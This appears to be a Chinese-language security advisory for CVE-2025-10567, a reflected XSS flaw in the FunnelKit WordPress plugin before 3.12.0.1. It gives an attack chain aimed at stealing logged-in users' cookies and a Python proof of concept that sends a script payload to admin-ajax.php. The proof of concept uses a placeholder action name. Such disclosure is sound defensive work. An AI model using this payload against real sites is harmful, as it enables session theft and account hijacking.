CVE-2025-10567 CVSS 6.3 中危

CVE-2025-10567: FunnelKit WordPress插件反射型XSS漏洞

披露日期: 2025-11-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-10567

漏洞类型

反射型XSS

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

FunnelKit WordPress Plugin

漏洞概述

CVE-2025-10567是WordPress FunnelKit插件中的一个反射型跨站脚本(XSS)漏洞。该漏洞存在于插件的结账相关AJAX操作中，由于未对用户输入进行适当的清理和转义就直接回显到页面中，导致攻击者可以在受害者访问特制链接时执行任意JavaScript代码。攻击者主要针对已登录用户，通过社会工程学手段诱导用户点击恶意链接，利用该漏洞窃取会话Cookie、劫持用户账户、修改页面内容或进行进一步的攻击。由于该漏洞需要用户交互(UI:R)才能触发，攻击复杂度较低(AC:L)，但通过网络(AV:N)即可发起攻击，对已登录用户的机密性、完整性和可用性均造成低等级影响。CVSS评分6.3，属于中等严重程度。

技术细节

该漏洞根源在于FunnelKit插件的AJAX端点处理用户输入时缺少输入验证和输出编码。攻击者可构造包含恶意JavaScript代码的参数通过AJAX请求传递给插件的checkout相关处理函数。由于插件直接将用户输入回显到响应中而未进行HTML实体编码或输入验证，恶意脚本会被浏览器解析执行。漏洞影响FunnelKit 3.12.0.1之前的所有版本。攻击者通常需要诱导已登录的管理员或用户访问特制链接或页面，利用浏览器的同源策略信任关系执行窃取Cookie、键盘记录或页面篡改等恶意操作。WPScan确认该漏洞的存在并向厂商报告，厂商已发布3.12.0.1版本修复此问题。

攻击链分析

STEP 1

步骤1

攻击者收集目标网站信息，确认FunnelKit插件版本低于3.12.0.1

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的XSS payload

STEP 3

步骤3

攻击者通过社会工程学手段(如钓鱼邮件、恶意链接)诱导已登录用户访问特制URL

STEP 4

步骤4

用户浏览器发送AJAX请求到FunnelKit插件的checkout端点

STEP 5

步骤5

插件未过滤用户输入直接将payload回显到响应中

STEP 6

步骤6

用户浏览器解析响应时执行注入的恶意JavaScript代码，窃取Cookie或进行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-10567 PoC - Reflected XSS in FunnelKit WordPress Plugin
# Target: FunnelKit plugin < 3.12.0.1

target_url = "http://target-wordpress-site.com"

# Malicious payload for reflected XSS
xss_payload = "<script>alert(document.cookie)</script>"

# FunnelKit AJAX endpoint - checkout related action
ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php"

# Construct malicious request
params = {
    "action": "funnelkit_checkout_action",  # Example action name
    "param_name": xss_payload  # Unsanitized parameter reflected in response
}

print(f"[*] Sending malicious request to {ajax_endpoint}")
print(f"[*] Payload: {xss_payload}")

try:
    response = requests.get(ajax_endpoint, params=params, timeout=10)
    
    # Check if payload is reflected in response
    if xss_payload in response.text:
        print("[+] VULNERABLE! XSS payload reflected in response")
        print("[+] Attack can be executed via social engineering")
    else:
        print("[-] Payload not reflected or patched")
        
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

影响范围

FunnelKit WordPress Plugin < 3.12.0.1

防御指南

临时缓解措施

如果无法立即升级，可临时禁用FunnelKit插件的checkout相关功能，同时在Web应用防火墙(WAF)层面添加XSS过滤规则，阻止包含<script>标签或JavaScript事件处理器的请求参数。监控日志中的可疑AJAX请求，及时发现和阻止攻击尝试。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表